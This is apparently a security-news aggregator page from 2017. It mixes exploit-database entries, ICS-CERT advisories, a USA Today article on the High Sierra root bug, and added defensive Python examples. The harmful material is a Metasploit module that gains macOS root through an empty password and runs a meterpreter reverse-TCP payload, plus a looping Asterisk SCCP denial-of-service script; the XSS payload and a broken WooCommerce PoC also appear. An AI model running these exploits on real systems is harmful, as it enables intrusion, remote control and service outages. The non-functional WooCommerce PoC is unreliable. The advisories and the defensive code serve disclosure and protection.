WordPress WooCommerce 2.0 / 3.0 Directory Traversal

# Exploit Title: WordPress woocommerce directory traversal
# Date: 28-11-2017
# Software Link: https://wordpress.org/plugins/woocommerce/
# Exploit Author: fu2x2000
# Contact: [email protected]
# Website:
# CVE: 2017-17058
# Version: Tested on WordPress 4.8.3 woocommerce 2.0/3.0
# Category: webapps

1. Description

Identifying whether the WooCommerce theme plugin is properly sanitized against directory
traversal: even the latest version of WordPress with WooCommerce can be
vulnerable.

2. Proof of Concept

<?php
// Path of the WooCommerce plain-text email templates on the target host
$woo = "www/wp-content/plugins/woocommerce/templates/emails/plain/";

// Fetch a URL through an HTTP stream context and return the body (false on failure)
function file_get_contents_utf8($fn) {
    $opts = array(
        'http' => array(
            'method' => "GET",
            'header' => "Content-Type: text/html; charset=utf-8"
        )
    );

    $wp = stream_context_create($opts);
    $result = @file_get_contents($fn, false, $wp);
    return $result;
}

header("Content-Type: text/html; charset=utf-8");

$result = file_get_contents_utf8("http://" . $woo);

echo $result;

Regards

Fu2x200
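As an added example that is not part of the post above or of WooCommerce's own code, the Python below shows the check a template loader needs in order to resist directory traversal: canonicalise the requested name under the templates directory and refuse anything that resolves outside it. The directory layout, the file names and the candidate requests are constructed for the demo.

```python
import tempfile
from pathlib import Path


class TraversalError(ValueError):
    """Raised when a requested path would leave the allowed base directory."""


def resolve_template(base_dir, requested):
    """Map a user-supplied template name onto a file inside base_dir.

    Both sides are canonicalised with Path.resolve(), which collapses '..'
    and follows symlinks; the result must then be a descendant of base_dir.
    """
    base = Path(base_dir).resolve()
    # NUL bytes truncate paths in C-level file APIs; never let them through.
    if "\x00" in requested:
        raise TraversalError("NUL byte in requested path")
    # An absolute 'requested' replaces base entirely when joined; resolve()
    # then yields a path outside base and the containment check rejects it.
    candidate = (base / requested).resolve()
    try:
        candidate.relative_to(base)
    except ValueError:
        raise TraversalError(f"{requested!r} escapes {base}") from None
    return candidate


def classify(base_dir, requests):
    """Return {request: 'allowed' | 'blocked'} for each candidate name."""
    verdicts = {}
    for req in requests:
        try:
            resolve_template(base_dir, req)
            verdicts[req] = "allowed"
        except TraversalError:
            verdicts[req] = "blocked"
    return verdicts


def demo():
    """Run the check against a constructed, throwaway copy of the templates directory."""
    with tempfile.TemporaryDirectory() as tmp:
        base = Path(tmp, "wp-content", "plugins", "woocommerce", "templates", "emails", "plain")
        base.mkdir(parents=True)
        (base / "customer-invoice.php").write_text("<?php // constructed sample template\n")
        return classify(base, [
            "customer-invoice.php",             # legitimate template name
            "sub/../customer-invoice.php",      # '..' that still stays inside base
            "../../../../../../wp-config.php",  # traversal towards the site root
            "/etc/passwd",                      # absolute path swallows the base
            "customer-invoice.php\x00.txt",     # NUL-byte truncation trick
        ])


if __name__ == "__main__":
    for request, verdict in demo().items():
        print(f"{verdict:8} {request!r}")
```

The containment test is done on the resolved path rather than by string-matching for `..`, so encoded or doubled separators that a naive filter would miss are handled once the web layer has URL-decoded the parameter; the decoding must happen before this check, not after it.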

Siemens SWT3000

CVSS v3 5.3

ATTENTION: Remotely exploitable/low skill level to exploit.

Vendor: Siemens

Equipment: SWT3000

Vulnerabilities: Improper Authentication, Authentication Bypass, Improper Input Validation.

AFFECTED PRODUCTS

Siemens reports that the vulnerabilities affect the following SWT 3000 Teleprotection system products:

  • EN100 for SWT3000 (iSWT3000):
    • IEC 61850 firmware: All versions prior to V4.29.01
    • TPOP firmware: All versions prior to V01.01.00

IMPACT

Successful exploitation of these vulnerabilities under certain conditions may allow attackers to perform a denial-of-service attack.

MITIGATION

Siemens has provided updated firmware that fixes the vulnerabilities for the following affected products and recommends users update to the newest version:

  • SWT3000:
    • IEC61850 firmware: Update to V4.29.01
    • TPOP firmware: Update to V01.01.00

To obtain the firmware please contact the Customer Support Center:

[email protected]

Siemens recommends users protect network access with appropriate mechanisms. Siemens also advises that users configure the operational environment according to Siemens’ Operational Guidelines for Industrial Security:

https://www.siemens.com/cert/operational-guidelines-industrial-security

Please note that not all of the devices above are affected by all vulnerabilities. For more information on these vulnerabilities and more detailed mitigation instructions, please see Siemens Security Advisory SSA-350846 at the following location:

http://www.siemens.com/cert/advisories

NCCIC/ICS-CERT recommends that users take defensive measures to minimize the risk of exploitation of these vulnerabilities. Specifically, users should:

  • Minimize network exposure for all control system devices and/or systems, and ensure that they are not accessible from the Internet.
  • Locate control system networks and remote devices behind firewalls, and isolate them from the business network.
  • When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.

ICS-CERT reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.

ICS-CERT also provides a section for control systems security recommended practices on the ICS-CERT web page. Several recommended practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.

Additional mitigation guidance and recommended practices are publicly available in the ICS-CERT Technical Information Paper, ICS-TIP-12-146-01B, Targeted Cyber Intrusion Detection and Mitigation Strategies, which is available for download from the ICS-CERT website.

Organizations observing any suspected malicious activity should follow their established internal procedures and report their findings to ICS-CERT for tracking and correlation against other incidents.

In addition, ICS-CERT recommends that users take the following measures to protect themselves from social engineering attacks:

  1. Do not click web links or open unsolicited attachments in email messages.
  2. Refer to Recognizing and Avoiding Email Scams for more information on avoiding email scams.
  3. Refer to Avoiding Social Engineering and Phishing Attacks for more information on social engineering attacks.

No known public exploits specifically target these vulnerabilities.

VULNERABILITY OVERVIEW

The integrated web server (Port 80/TCP) of the affected devices could allow remote attackers to obtain sensitive device information if network access was obtained. SWT3000 with TPOP is not affected by this vulnerability.

CVE-2016-4784 has been assigned to this vulnerability. A CVSS v3 base score of 5.3 has been calculated; the CVSS vector string is (AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N).

The integrated web server (Port 80/TCP) of the affected devices could allow remote attackers to obtain a limited amount of device memory content if network access was obtained. SWT3000 with TPOP is not affected by this vulnerability.

CVE-2016-4785 has been assigned to this vulnerability. A CVSS v3 base score of 5.3 has been calculated; the CVSS vector string is (AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N).

Attackers with network access to the device’s web interface (Port 80/TCP) could possibly circumvent authentication and perform certain administrative operations.

CVE-2016-7112 has been assigned to this vulnerability. A CVSS v3 base score of 5.3 has been calculated; the CVSS vector string is (AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N).

Specially crafted packets sent to Port 80/TCP could cause the affected EN100 module of the SWT3000 to go into defect mode.

CVE-2016-7113 has been assigned to this vulnerability. A CVSS v3 base score of 5.3 has been calculated; the CVSS vector string is (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).

Attackers with network access to the device’s web interface (Port 80/TCP) could possibly circumvent authentication and perform certain administrative operations. A legitimate user must be logged into the web interface for the attack to be successful.

CVE-2016-7114 has been assigned to this vulnerability. A CVSS v3 base score of 4.3 has been calculated; the CVSS vector string is (AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N).

RESEARCHER

Siemens reported these vulnerabilities to ICS-CERT.

BACKGROUND

Critical Infrastructure Sectors: Energy

Countries/Areas Deployed: Worldwide

Company Headquarters Location: Germany

Geovap Reliance SCADA

CVSS v3 6.1

ATTENTION: Remotely exploitable/low skill level to exploit.

Vendor: Geovap

Equipment: Reliance SCADA

Vulnerability: Cross-site Scripting

AFFECTED PRODUCTS

The following versions of Reliance SCADA, a software management platform, are affected:

  • Reliance SCADA Version 4.7.3 Update 2 and prior.

IMPACT

Successful exploitation of this vulnerability could allow an unauthenticated attacker to inject arbitrary JavaScript in a specially crafted URL request that may allow for read/write access.

MITIGATION

Geovap has released Version 4.7.3 Update 3 of the software which can be found at:

https://www.reliance-scada.com/en/download

NCCIC/ICS-CERT recommends that users take defensive measures to minimize the risk of exploitation of this vulnerability. Specifically, users should:

  • Minimize network exposure for all control system devices and/or systems, and ensure that they are not accessible from the Internet.
  • Locate control system networks and remote devices behind firewalls, and isolate them from the business network.
  • When remote access is required, use secure methods such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.

ICS-CERT reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.

ICS-CERT also provides a section for control systems security recommended practices on the ICS-CERT web page. Several recommended practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.

Additional mitigation guidance and recommended practices are publicly available in the ICS-CERT Technical Information Paper, ICS-TIP-12-146-01B, Targeted Cyber Intrusion Detection and Mitigation Strategies, which is available for download from the ICS-CERT website.

Organizations observing any suspected malicious activity should follow their established internal procedures and report their findings to ICS-CERT for tracking and correlation against other incidents.

No known public exploits specifically target this vulnerability.

VULNERABILITY OVERVIEW

This vulnerability could allow an unauthenticated attacker to inject arbitrary code.

CVE-2017-16721 has been assigned to this vulnerability. A CVSS v3 base score of 6.1 has been assigned; the CVSS vector string is (AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N).

RESEARCHER

Can Demirel reported the vulnerability to ICS-CERT.

BACKGROUND

Critical Infrastructure Sectors: Critical Manufacturing, Energy, Transportation Systems, and Water and Wastewater Systems

Countries/Areas Deployed: Worldwide

Company Headquarters Location: Czech Republic

ZKTeco ZKTime Web 2.0.1.12280 Cross Site Scripting

*1. Introduction*

Vendor: ZKTeco
Affected Product: ZKTime Web – 2.0.1.12280
Fixed in:
Vendor Website: https://www.zkteco.com/product/ZKTime_Web_2.0_435.html
Vulnerability Type: Reflected XSS
Remote Exploitable: Yes
CVE: CVE-2017-17057
*2. Overview*

There is a reflected XSS vulnerability in ZKTime Web. The
vulnerability exists due to insufficient filtration of user-supplied data.
A remote attacker can execute arbitrary HTML and script code in the browser in
the context of the vulnerable application.

*3. Affected Modules*

Go to
Personnel -> Personnel -> Advanced Query

Select Search Field as 'Department' and in the 'Range' field enter
<script>alert('XSS')</script>

*4. Payload*
<script>alert('XSS')</script>

*5. Credit*
Himanshu Mehta (@LionHeartRoxx)
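As an added example, not code from ZKTime Web or from the advisory author, the Python below contrasts the unsafe rendering pattern the overview describes (user input copied into the page without filtering) with the hardened one (HTML-escaping for the text context), and applies the page's payload to both. The URL, path and parameter names are constructed for the demo.

```python
import html
import re
from urllib.parse import parse_qs, urlsplit

# Matches a <script ...> tag that survived into the rendered page
SCRIPT_TAG = re.compile(r"<\s*script\b", re.IGNORECASE)


def query_params(url):
    """Pull the search field and range out of a query URL (constructed parameter names)."""
    qs = parse_qs(urlsplit(url).query)
    return qs.get("field", [""])[0], qs.get("range", [""])[0]


def render_unsafe(field, value):
    # Vulnerable pattern: untrusted input copied verbatim into an HTML text context.
    return f"<h2>Advanced Query</h2><p>Search field: {field}, range: {value}</p>"


def render_safe(field, value):
    # Hardened pattern: every untrusted value is HTML-escaped for the text
    # context it lands in (attribute and JavaScript contexts need their own encoders).
    return (f"<h2>Advanced Query</h2>"
            f"<p>Search field: {html.escape(field)}, range: {html.escape(value)}</p>")


def reflects_script(page, user_value):
    """True when the user's value comes back with its markup intact and executable."""
    return user_value in page and SCRIPT_TAG.search(page) is not None


if __name__ == "__main__":
    # Constructed request carrying the page's payload in the 'range' parameter
    url = ("https://zktime.example/personnel/advanced_query"
           "?field=Department&range=%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E")
    field, rng = query_params(url)
    for name, renderer in [("unsafe", render_unsafe), ("safe", render_safe)]:
        page = renderer(field, rng)
        print(f"{name:6} reflected executable script: {reflects_script(page, rng)}")
        print("       ", page)
```

`html.escape` neutralises the text-context case shown here; the same value placed inside an attribute, a `<script>` block or a URL needs the encoder for that context, which is why output encoding is chosen per sink rather than applied once at input.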

NCSC Releases Security Advisory

Original release date: November 29, 2017

The United Kingdom’s National Cyber Security Centre (NCSC) has released an advisory to highlight Neuron and Nautilus tools used alongside Snake—malware that provides a platform to steal sensitive data. NCSC provides enhanced cybersecurity services to protect against cybersecurity threats.

US-CERT encourages users and administrators to review the NCSC advisory for more information.



Mac OS X Root Privilege Escalation

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Post::File
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  def initialize(info={})
    super(update_info(info,
      'Name'           => 'Mac OS X Root Privilege Escalation',
      'Description'    => %q{
        This module exploits a serious flaw in MacOSX High Sierra.
        Any user can login with user "root", leaving an empty password.
      },
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'URL', 'https://twitter.com/lemiorhan/status/935578694541770752' ],
          [ 'URL', 'https://news.ycombinator.com/item?id=15800676' ],
          [ 'URL', 'https://forums.developer.apple.com/thread/79235' ],
        ],
      'Platform'       => 'osx',
      'Arch'           => ARCH_X64,
      'DefaultOptions' =>
        {
          'PAYLOAD' => 'osx/x64/meterpreter_reverse_tcp',
        },
      'SessionTypes'   => [ 'shell', 'meterpreter' ],
      'Targets'        => [
        [ 'Mac OS X 10.13.1 High Sierra x64 (Native Payload)', { } ]
      ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Nov 29 2017'
    ))
  end

  def exploit_cmd(root_payload)
    "osascript -e 'do shell script \"#{root_payload}\" user name \"root\" password \"\" with administrator privileges'"
  end

  def exploit
    payload_file = "/tmp/#{Rex::Text::rand_text_alpha_lower(12)}"
    print_status("Writing payload file as '#{payload_file}'")
    write_file(payload_file, payload.raw)
    register_file_for_cleanup(payload_file)
    output = cmd_exec("chmod +x #{payload_file}")
    print_status("Executing payload file as '#{payload_file}'")
    cmd_exec(exploit_cmd(payload_file))
  end
end

Asterisk 13.17.2~dfsg-2 Memory Exhaustion

# Exploit Author: Juan Sacco <[email protected]> at KPN Red Team - http://www.kpn.com
# Date and time of release: Nov, 15 2017
# Found this and more exploits on my open source security project: http://www.exploitpack.com
#
# Tested on: Asterisk 13.17.2~dfsg-2
#
# Description: Asterisk is prone to a remote unauthenticated memory exhaustion.
# The vulnerability is due to an error when the vulnerable application
# handles a crafted SCCP packet. A remote attacker may be able to exploit
# this to cause a denial of service condition on the affected system.
#
# [Nov 29 15:38:06] ERROR[7763] tcptls.c: TCP/TLS unable to launch helper thread: Cannot allocate memory
#
# Program: Asterisk is an Open Source PBX and telephony toolkit. It is, in a
# sense, middleware between Internet and telephony channels on the bottom,
# and Internet and telephony applications at the top.
#
# Homepage: http://www.asterisk.org/
# Filename: pool/main/a/asterisk/asterisk_13.17.2~dfsg-2_i386.deb
#
# Example usage: python asteriskSCCP.py 192.168.1.1 2000

import binascii
import socket
import sys
import time


def timestamp():
    # Shared console/log prefix, e.g. "[Wed 15:38:06]"
    return "[" + time.strftime("%a %H:%M:%S") + "]"


def asteriskSCCP(target, port):
    try:
        while True:
            # Open socket
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            # Set reuse ON
            s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
            # Connect to the SCCP listener
            s.connect((target, port))
            print(timestamp() + " - Connected to:", target, port)
            print(timestamp() + " - Establishing connection.. ")
            # The crafted SCCP packet; its hex string is elided on this page
            packet = binascii.unhexlify(b'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')

            # Log the packet in hex with a timestamp
            fileLog = target + ".log"
            with open(fileLog, "w+") as logPacket:
                logPacket.write(timestamp() + " - Packet sent: "
                                + binascii.hexlify(packet).decode("ascii") + "\n")

            # Write the bytes to the socket
            print(timestamp() + " - Packet sent: ")
            s.send(packet)
            print(packet)
            try:
                data = s.recv(4096)
                print(timestamp() + " - Data received: '{msg}'".format(msg=data))
            except socket.error:
                print("Sorry, No data available")
                continue
            s.close()
    except socket.error as error:
        print(error)
        print("Sorry, something went wrong!")


def howtouse():
    print("Usage: AsteriskSCCP.py Hostname Port")
    print("[*] Mandatory arguments:")
    print("[-] Specify a hostname / port")
    sys.exit(-1)


if __name__ == "__main__":
    try:
        # Set target
        target = sys.argv[1]
        port = int(sys.argv[2])

        print("[*] Asterisk 13.17 Exploit by Juan Sacco ")
        print("[*] Red Team KPN <[email protected]> ")
        asteriskSCCP(target, port)
    except (IndexError, ValueError):
        howtouse()
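The exploit header quotes the one trace this condition leaves on the PBX: an Asterisk ERROR line from tcptls.c saying the helper thread could not be launched because memory could not be allocated. The Python below is an added example, not part of the exploit or of Asterisk, that parses Asterisk's full-log line format and raises one alert per burst of such failures, which is the signal an operator would watch for. The sample log is constructed: only the ERROR text is taken from the page, repeated with shifted timestamps; the other lines are made up, and the parser, threshold and window are my own choices.

```python
import re
from collections import deque
from datetime import datetime

# Asterisk full-log line: [Mon DD HH:MM:SS] LEVEL[pid] source.c: message
LOG_RE = re.compile(
    r"^\[(?P<ts>[A-Z][a-z]{2} +\d{1,2} \d{2}:\d{2}:\d{2})\] "
    r"(?P<level>[A-Z]+)\[(?P<pid>\d+)\] (?P<src>\S+): (?P<msg>.*)$"
)

# The allocation failure quoted in the exploit header
ALLOC_FAILURE = "Cannot allocate memory"

# Constructed sample log (see the lead-in); one isolated failure at the end
# is deliberately below the burst threshold.
SAMPLE_LOG = """\
[Nov 29 15:37:58] VERBOSE[7763] tcptls.c: (constructed) accepted connection from 192.0.2.10
[Nov 29 15:38:02] WARNING[7763] tcptls.c: (constructed) peer closed without a handshake
[Nov 29 15:38:06] ERROR[7763] tcptls.c: TCP/TLS unable to launch helper thread: Cannot allocate memory
[Nov 29 15:38:07] ERROR[7763] tcptls.c: TCP/TLS unable to launch helper thread: Cannot allocate memory
[Nov 29 15:38:09] ERROR[7763] tcptls.c: TCP/TLS unable to launch helper thread: Cannot allocate memory
[Nov 29 15:39:40] ERROR[7763] tcptls.c: TCP/TLS unable to launch helper thread: Cannot allocate memory
not a log line at all
"""


def parse_line(line, year=2017):
    """Split one log line into its fields; returns None for lines that do not match."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    # Asterisk omits the year from the timestamp, so the caller supplies it.
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return {"ts": ts, "level": m["level"], "pid": int(m["pid"]),
            "src": m["src"], "msg": m["msg"]}


def memory_pressure_alerts(lines, threshold=3, window_seconds=60):
    """Return one (timestamp, count) alert per burst of allocation failures.

    A burst is `threshold` ERROR lines mentioning ALLOC_FAILURE inside a
    sliding window of `window_seconds`; a single isolated failure is ignored.
    """
    recent = deque()
    alerts = []
    for line in lines:
        ev = parse_line(line)
        if ev is None or ev["level"] != "ERROR" or ALLOC_FAILURE not in ev["msg"]:
            continue
        recent.append(ev["ts"])
        # Drop failures that fell out of the window
        while (ev["ts"] - recent[0]).total_seconds() > window_seconds:
            recent.popleft()
        if len(recent) >= threshold:
            alerts.append((ev["ts"], len(recent)))
            recent.clear()  # one alert per burst, not one per line
    return alerts


if __name__ == "__main__":
    for when, count in memory_pressure_alerts(SAMPLE_LOG.splitlines()):
        print(f"{when:%b %d %H:%M:%S}: {count} thread-launch failures within 60s")
```

Pairing this with connection counts from the same log (or from the firewall) tells the two causes apart: a burst of allocation failures with a flood of new connections from one source points at this kind of exhaustion, while the same errors with normal connection rates point at a host that is simply out of memory.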

Apple’s MacOS High Sierra security bug: Do this now

SAN FRANCISCO — Apple pushed out a fix for a serious security bug in computers running its most recent operating system on Wednesday morning, less than a day after it was first widely reported.  

The bug in the Apple operating system allowed anyone with physical access to a Mac running the latest version of Apple’s operating system to easily infiltrate the computer and gain full access to everything on it.

It only affected Macs that run the latest version of Apple’s operating system software, MacOS High Sierra.

Apple users need to install the latest update to their operating system to correct the problem. To do so:

– Open the App Store app on the Mac.

– Click Updates in the App Store toolbar

– Use the Update buttons to download and install any updates listed.

– Updates installed in the last 30 days appear below this list.

The bug requires the would-be hacker to actually type on the Mac in question’s keyboard, so the easiest fix is to keep vulnerable machines under lock and key. There were also reports that in some cases if a user has allowed screen sharing on their computer it’s possible to exploit the bug remotely. 

The bug only affects Macs that run the latest version of Apple’s operating system software, MacOS High Sierra. 

The bug, made public on Twitter Tuesday by Turkish software developer Lemi Orhan Ergin, revealed that anyone can log into a Mac running that operating system, or adjust settings on the computer, by entering the login name “root” (without quotations) and clicking enter, no password needed. 

The person would need physical access to the computer as the login can’t be done remotely.

To check for the vulnerability

It appears that the bug only affects Apple machines running the High Sierra 10.13 or 10.13.1 operating systems. To see which operating system a computer is running, click the apple icon in the upper left hand corner of the screen and then click “About this Mac.” That will give the version number of the operating system. 

To see if a Mac is vulnerable to the bug, follow these steps:

– Open System Preferences

– Choose Users & Groups 

– Click the lock to make changes 

– Type “root” in the username field 

– Put the cursor in the Password field and click there, but don’t type anything 

– Click unlock. If the system allows you in, you would be able to add a new administrator-level account with full privileges on the system — all without a password to the computer. 

Apple working on a fix

USA TODAY confirmed the vulnerability on a late 2013 MacBook Pro running MacOS 10.13.1 and a late 2015 iMac running the same software. The bug unlocked the safeguards that prevent changes in “System Preferences” on the machine as well as letting someone log into the Mac from the lock screen by simply going to the “other user” tab. 

In following Apple’s steps USA TODAY was able to disable the “root user” access.

Apple did not immediately respond to a question as to when users might expect to see a software update. 

It should go without saying that the bug poses plenty of risks. By giving anyone administrator access, they would have unfiltered access to your files as well as the ability to delete your data, change your password or even lock you out. The security vulnerability also would allow someone to make these changes remotely so long as they were connected to your computer. 

Contributing: Ed Baig

Follow Eli Blumenthal on Twitter @eliblumenthal and Elizabeth Weise @eweise

https://amp-usatoday-com.cdn.ampproject.org/c/s/amp.usatoday.com/amp/903923001